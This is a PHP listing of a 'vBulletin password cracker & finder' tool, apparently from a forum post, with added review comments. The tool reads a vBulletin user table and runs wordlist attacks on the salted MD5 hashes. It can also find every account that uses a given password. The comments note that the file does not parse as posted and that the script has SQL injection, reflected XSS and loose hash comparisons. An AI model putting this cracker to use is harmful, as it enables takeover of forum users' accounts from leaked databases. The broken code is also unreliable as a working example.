
vBulletin password cracker & finder v1.0.2b




############################################################
## Author: M4k3 ##
## Script-Version: 1.0.2b ##
## Script-Name: vb_tool.php ##
## Copyright: pldsecurity.de / .com /pldsoft.com ##
## ##
## Comment: Next Version coming soon, check ##
## pldsecurity.com for Updates ##
############################################################

# For Crack Option, you need: [vbulletin database] & [wordlist]
# For Find Option, you need: [vbulletin database]

###################### Set Error Reporting #################
# Notices are masked. The script indexes arrays with bare words throughout
# ($mysql[server], $user[salt], ...); PHP resolves each as an undefined constant
# and falls back to the string, and the notice that would flag it is hidden here.
# From PHP 8.0 on an undefined constant is an Error instead.
error_reporting(E_ALL & ~E_NOTICE);

# Hard cap on run time; the author's sizing guidance follows.
set_time_limit(60);

# 60 for a database with 1000 Users
# 180 for a database with 3000 Users
####################### Change Values ######################

#MySQL Values
# NOTE(review): the defaults are the MySQL root account with an empty password on
# localhost - presumably a locally restored copy of the forum database; confirm.
$mysql[server] = 'localhost:3306';
$mysql[username] = 'root';
$mysql[password] = '';
$mysql[database] = 'vbulletin';
$mysql[table] = 'user';
# NOTE(review): `$mysql[/page][page]` is not valid PHP. It looks like the forum
# software mangled the original array key when the post was rendered; the intended
# key cannot be recovered from this listing, so the file does not parse as posted.
$mysql[/page][page] = '20'; # Show 20 User / Site on User list

#Script Values
$script[wordlist] = 'word.txt';

# crack_option is only ever assigned false (wordlist missing). When the file exists
# the key stays unset, which the later `!== false` test treats as enabled.
if(!file_exists($script[wordlist])) {
$script[crack_option] = false;
}

$script[version] = '1.0.2b';

#############################################################

###################### Connection ###########################

# ext/mysql (mysql_connect, mysql_select_db, mysql_query, ...) was removed in
# PHP 7.0, so this listing only runs on PHP 5.x.
# The or-die handlers print the raw MySQL error text to the browser.
$mysql[connect] = mysql_connect($mysql[server], $mysql[username], $mysql[password])
or die ("MySQL-Error: " .mysql_error());

$mysql[connect_db] = mysql_select_db($mysql[database], $mysql[connect])
or die ("MySQL-Error: " . mysql_error());

#############################################################

# Sanity check run before any page output: issue a full SELECT against the
# configured table and report success.
# Returns 1 when the query succeeded. A failed query never reaches the return,
# because the or-die aborts the script and prints the raw MySQL error text.
# NOTE(review): mysql_query() belongs to ext/mysql, which was removed in PHP 7.0.
function check_table() {
global $mysql;

# Bare-word key: PHP reads `table` as an undefined constant and falls back to the
# string 'table' (a notice on PHP 5, hidden by the script's error_reporting mask).
# The result set is never read; every row is selected only to prove the table exists.
$query = mysql_query("Select * from ".$mysql[table]."")
or die ("MySQL-Error: " . mysql_error());
if(!mysql_error()) {
return 1;
}
}

# Given one candidate password from the form, print every account in the user
# table whose stored hash matches it.
#
# The comparison below documents the stored format the script expects:
# md5(md5(password) . salt). MD5 is a fast hash, so the per-user salt only blocks
# precomputed tables; it does not slow dictionary guessing once the user table has
# been copied. Forum operators should treat an exposed user table as credential
# compromise and move stored passwords to a slow, purpose-built scheme such as
# password_hash().
#
# NOTE(review): a parameter named $_POST is rejected at compile time by PHP 5.4 and
# later (a superglobal cannot be re-assigned), so this signature needs an ordinary
# parameter name before the file will load on those versions.
function find_password($_POST) {
global $mysql;

$query = mysql_query("Select * from ".$mysql[table]."")
or die ("MySQL-Error: " . mysql_error());

# First pass: concatenate every salt in the table, separated by the literal text
# that htmlentities('<r>') yields. $script is not declared global in this function,
# so this is a local array. A salt that itself contained the separator text would
# be split in two by the explode() below.
while($user = mysql_fetch_array($query)) {
$script[get_salt] .= $user[salt].htmlentities('<r>');
}

# The trailing separator leaves an empty string as the last element.
$script[salt] = explode(htmlentities('<r>'), $script[get_salt]);


# Second pass over the same table: the query is simply issued again.
$query = mysql_query("Select * from ".$mysql[table]."")
or die ("MySQL-Error: " . mysql_error());

while($user = mysql_fetch_array($query)) {

# Each row is compared against every collected salt, not just its own, and the
# `<=` bound reads one index past the end of the array (an undefined offset).
# NOTE(review): `==` on two hex digests is a loose comparison; digests of the form
# 0e<digits> compare equal as numbers, so === is the correct operator here.
for($i=0;$i<=sizeof($script[salt]);$i++) {
if(md5(md5(rtrim($_POST['password'])).$script[salt][$i]) == $user[password]) {
# Username and userid are written into the HTML response without escaping.
print 'Password found! Username: '.$user[username].' Userid: '.$user[userid].'
';
flush();
}
}
}
}

# Look up one account by username and compare each line of the configured wordlist
# against its stored hash, using the same md5(md5(word) . salt) construction as
# find_password(). Prints the outcome as HTML; returns nothing.
#
# NOTE(review): as with find_password(), a parameter named $_POST is a compile-time
# error on PHP 5.4 and later.
function crack_password($_POST) {
global $script;
global $mysql;

# The username is placed in the SQL string after addslashes(), which is not aware of
# the connection character set. mysql_real_escape_string() or a prepared statement
# is the correct way to bind a value, even in a tool run locally.
$query = mysql_query("Select * from ".$mysql[table]." where username = '".addslashes($_POST['username'])."'")
or die ("MySQL-Error: " . mysql_error());
$user = mysql_fetch_array($query);

if(!is_array($user)) {
# addslashes() is not HTML escaping: the submitted username is reflected into the
# page as-is, and $_SERVER[PHP_SELF] is echoed unescaped as well. Both need
# htmlspecialchars() with ENT_QUOTES.
# NOTE(review): the [b]...[/b] markers look like forum markup that replaced the
# original HTML tags when the post was rendered - confirm against the original file.
print 'The User with the name [b]'.addslashes($_POST['username']).'[/b] doesn\'t exist.

<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>';
} else {
# The fopen() result is not checked before it is handed to feof()/fgets().
$file = fopen($script[wordlist], 'r');

while(!feof($file)) {

# Lines longer than 4095 bytes are read in pieces.
$word = fgets($file, 4096);

# Loose `==` between hex digests (see find_password); === is the correct operator.
# The loop keeps reading after a match, and $word is printed with its line ending
# and without HTML escaping.
if(md5(md5(rtrim($word)).$user[salt]) == $user[password]) {
print 'Password Cracked! Password is [b]'.$word.'[/b]';
$cracked = true;
}

}
# $cracked is never initialised; when no line matched it is undefined, which
# compares loosely equal to false.
if($cracked == false) {
print 'Failed to Crack Password.';
}
fclose($file);
}
}


# Page controller. Everything below runs only when check_table() returned 1 and is
# routed by the query-string flags crack_option / find_option and the `do` action.
# The page has no access control of its own: whoever can reach the URL can browse
# the user list and run both options against the configured database.
if(check_table() == 1) {
# Static page head and stylesheet.
print '<html>
<head>
<title>VBulletin Password Cracker</title>
<style type = "text/css">
body {
font-size: 11px;
text-align: center;
}
.option_table {
font-size: 11px;
border: 1px #000000 solid;
width: 300px;
}
.main_table {
font-size: 11px;
border: 1px #000000 solid;
width: 350px;
}
.user_table {
font-size: 11px;
text-align: center;
border: 0px #000000 solid;
}
.show_user {
border: 1px #000000 solid;
width: 125px;
}
.input_text {
font-size: 11px;
}
.input_submit {
color: #ffffff;
font-size: 11px;
border: 1px #000000 solid;
background-color: #000000;
}
a:link {
color: #000000;
text-decoration: none;
}
a:hover {
color: #000000;
text-decoration: underline overline;
}
</style>
</head>
<body>';


# Landing form: shown when neither option flag is present in the query string.
# NOTE(review): both <hr ...> tags in this form are missing their closing `>`, and
# the [b]...[/b] markers look like forum markup that replaced the original HTML tags.
if(empty($_GET['crack_option']) && empty($_GET['find_option'])) {
print '<form method = "get">
<table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "option_table">
<tr>
<td colspan = "2" align = "center">
[b]vbulletin password cracker & finder '.$script[version].'[/b]

<hr size = "1" style = "border: 1px #000000 solid;"
</td>
</tr>
<tr>
<td>';
# The checkbox is disabled only when the configuration step found no wordlist file.
if($script[crack_option] !== false) {
print '<input type = "checkbox" name = "crack_option">';
} else {
print '<input type = "checkbox" name = "crack_option" disabled>';
}
print '</td>
<td>
Use "Crack Password" Option
</td>
</tr>
<tr>
<td>
<input type = "checkbox" name = "find_option">
</td>
<td>
Use "Find Password" Option
</td>
</tr>
<tr>
<td colspan = "2" align = "center">
<hr size = "1" style = "border: 1px #000000 solid;"
<input type = "submit" value = "Run Option" class = "input_submit">
</td>
</tr>
<tr>
<td colspan = "2" align = "center">
© Copyright by M4k3 <a href = "http://pldsecurity.com">PLDsecurity.com</a>
</td>
</tr>
</table>
</form>';
}


# Disabling the checkbox above is cosmetic: this branch is selected purely by the
# query string and does not re-check $script[crack_option].
if($_GET['crack_option'] == 'on') {

# Paged listing of userid / username pairs.
if($_GET['do'] == 'show_user') {

print '<table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "user_table">
<tr>
<td colspan = "2" class = "show_user">
Please select a username.
</td>
</tr>
<tr>
<td class = "show_user">
Userid
</td>
<td class = "show_user">
Username
</td>
</tr>';

# First page: no start/end supplied. Note that empty() is also true for "0".
if(empty($_GET['start']) && empty($_GET['end'])) {
# NOTE(review): `$mysql[/page][page]` is not valid PHP. It looks like the forum
# software mangled the page-size key when the post was rendered; the same damage
# recurs at every use below, so the file does not parse as posted.
$query = mysql_query("Select userid, username from ".$mysql[table]." limit 0, ".$mysql[/page][page]."")
or die ("MySQL-Error: " . mysql_error());

while($show_user = mysql_fetch_array($query)) {
# Values read from the database are written into an href and into element text
# with neither urlencode() nor htmlspecialchars().
# NOTE(review): whether stored usernames can carry markup depends on the forum
# that produced the table - confirm before trusting this output.
print '<tr>
<td class = "show_user">
'.$show_user[userid].'
</td>
<td class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=get_user&username='.$show_user[username].'">
'.$show_user[username].'</a>
</td>
</tr>';
}

# `end` is always emitted as the page size; the query below uses it as the LIMIT
# row count rather than as an end offset.
print '<tr>
<td colspan = "2" align = "right" class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$mysql[/page][page].'&end='.$mysql[/page][page].'">
Next Page >></a>
</td>
</tr>
</table>


';

print '<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>';

} else {

# The LIMIT operands come straight from the query string. addslashes() only escapes
# quote characters, and these values sit in an unquoted numeric position, so it
# gives no protection against SQL injection here; both operands need an integer
# cast (or a prepared statement) before they reach the query.
$query = mysql_query("Select userid, username from ".$mysql[table]." limit
".addslashes($_GET['start']).",".addslashes($_GET['end'])."")
or die ("MySQL-Error: " . mysql_error());

while($show_user = mysql_fetch_array($query)) {
# Same unescaped database output as on the first page.
print '<tr>
<td class = "show_user">
'.$show_user[userid].'
</td>
<td class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=get_user&username='.$show_user[username].'">
'.$show_user[username].'</a>
</td>
</tr>';
}

# Arithmetic on the raw request value; PHP coerces the string to a number here.
$page[next] = $_GET['start'] + $mysql[/page][page];
$page[previous] = $_GET['start'] - $mysql[/page][page];

# The table name is hard-coded as `user` here, while every other query uses the
# configured $mysql[table]; the two disagree as soon as the setting is changed.
$query = mysql_query("Select count(*) from user")
or die ("MySQL-Error: " . mysql_error());
$mysql[table_count] = mysql_fetch_array($query);

# Choose the pager links: Next only, Previous only, or both.
if($page[previous] < 0) {
print '<tr>
<td colspan = "2" align = "right" class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[next].'&end='.$mysql[/page][page].'">
Next Page >></a>
</td>
</tr>
</table>


';
} elseif($page[next] > $mysql[table_count][0]) {
print '<tr>
<td colspan = "2" align = "left" class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[previous].'&end='.$mysql[/page][page].'">
<< Previous Page</a>
</td>
</tr>
</table>


';
} else {
print '<tr>
<td align = "left" class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[previous].'&end='.$mysql[/page][page].'">
<< Previous Page</a>
</td>
<td align = "right" class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[next].'&end='.$mysql[/page][page].'">
Next Page >></a>
</td>
</tr>
</table>


';
}
print '<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>';
}

} elseif($_GET['do'] == 'crack_password' && !empty($_POST['username'])) {

# Hand the submitted form to the wordlist comparison.
crack_password($_POST);

} else {

# Username entry form. $_SERVER[PHP_SELF] is written into the form action and the
# links unescaped; it needs htmlspecialchars() because the request path feeds it.
print '<form action = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=crack_password" method = "post">
<table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "main_table">
<tr>
<td colspan = "2" align = "center">
Insert a username or use the function "show user list"
<hr size = "1" style = "border: 1px #000000 solid;">
</td>
</tr>
<tr>
<td>
Username:
</td>
<td>';
if($_GET['do'] == 'get_user' && !empty($_GET['username'])) {
# Reflected cross-site scripting in the tool itself: the query-string value is
# copied into a double-quoted attribute with no escaping. It must pass through
# htmlspecialchars() with ENT_QUOTES before being printed.
print '<input type = "text" name = "username" value = "'.$_GET['username'].'" size = "30"
class = "input_text">';
} else {
print '<input type = "text" name = "username" size = "30" class = "input_text">';
}

print '</td>
</tr>
<tr>
<td colspan = "2" align = "center">
<input type = "submit" value = "Crack Password" class = "input_submit">
</td>
</tr>
<tr>
<td colspan = "2" align = "center">
<hr size = "1" style = "border: 1px #000000 solid;">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user">show user list</a>
</td>
</tr>
</table>
</form>



<a href = "'.$_SERVER[PHP_SELF].'">Back to Script Index</a>';

}

} elseif($_GET['find_option'] == 'on') {

# Find option: either run the lookup for the posted password or show the entry form.
if($_GET['do'] == 'find_password' && !empty($_POST['password'])) {
print 'Searching...
';
flush();
find_password($_POST);
} else {
# The candidate password is entered in a plain type="text" field.
print '<form action = "'.$_SERVER[PHP_SELF].'?find_option=on&do=find_password" method = "post">
<table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "main_table">
<tr>
<td colspan = "2" align = "center">
Please insert a password.
<hr size = "1" style = "border: 1px #000000 solid;">
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type = "text" name = "password" size = "30" class = "input_text">
</td>
</tr>
<tr>
<td colspan = "2" align = "center">
<input type = "submit" value = "Find Password" class = "input_submit">
</td>
</tr>
</table>
</form>



<a href = "'.$_SERVER[PHP_SELF].'">Back to Script Index</a>';
}

}

# Close the document opened at the top of this block.
print '


</body>
</html>';

}

?>
<?

# For Crack Option, you need: [vbulletin database] & [wordlist]

# For Find Option, you need: [vbulletin database]
